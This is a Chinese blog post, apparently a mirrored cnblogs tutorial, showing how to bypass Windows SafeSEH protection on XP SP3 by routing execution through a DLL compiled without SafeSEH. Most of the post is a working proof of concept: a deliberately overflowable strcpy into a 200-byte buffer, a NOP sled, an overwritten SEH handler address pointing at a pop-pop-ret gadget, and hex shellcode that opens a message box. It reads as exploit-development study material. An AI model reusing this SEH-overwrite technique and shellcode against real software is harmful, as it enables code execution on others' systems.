zoukankan      html  css  js  c++  java

  • 利用未启用SafeSEH模块绕过SafeSEH

    此方法可以说不是方法了·········必须程序要加载一个没用开启SafeSEH的DLL 才能去突破产生对话框


    DLL模块编译:

    /base:"0x11120000"

    #include "stdafx.h"
BOOL APIENTRY DllMain( HANDLE hModule,DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    return TRUE;
}
void jump()
{
__asm{
	pop eax
	pop eax
	retn
	}
}

    下载OD插件   OLLYSEH  http://www.openrce.org/downloads/details/244/OLLYSSEH%20targrt=

    插件原理

    /*
XP SP3   
VS2008   SafeSEH 保护  
新建DLL 未启动 SafeSEH
把它当成跳板  跳向我们的shellcode执行
*/
#include <stdafx.h>
#include <windows.h>

char shellcode[]=
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x12x10x12x11"
/*
11121012    58              pop eax
11121013    58              pop eax
11121014    C3              retn
*/
"x90x90x90x90x90x90x90x90"//这里说一下这个: VS2008 进入含有try块 会在Security Cookie+4 的位置压入-2 VC++6.0是-1 所以这里空出8字节
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";//168


DWORD MyException(void)
{
	printf("There is an exception");
	getchar();
	return 1;
}
void test(char * input)
{
	char str[200];
	strcpy(str,input);	
	int zero=0;
	__try
	{
		zero=1/zero;
	}
	__except(MyException())
	{
	}
}
int _tmain(int argc, _TCHAR* argv[])
{
	HINSTANCE hInst = LoadLibrary(_T("SEH_NOSafeSEH_JUMP.dll"));//load No_SafeSEH module
	char str[200];
	//__asm int 3
		test(shellcode);
	return 0;
}




    当我们    pop  pop  ret  后就会跳到一下异常指针地址去  0012FE90    此处已被我们  90909090  掉了
  • 相关阅读:
    九度OJ 1035:找出直系亲属(二叉树)
    while 循环的理解
    while 循环的理解
    count 变量的使用
    count 变量的使用
    数据结构与算法的实现 —— 结点定义与数据结构的选择
    数据结构与算法的实现 —— 结点定义与数据结构的选择
    最小生成树(MST,minimum spanning tree)
    最小生成树(MST,minimum spanning tree)
    Opencv中Mat矩阵相乘——点乘、dot、mul运算详解
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982500.html
Copyright © 2011-2022 走看看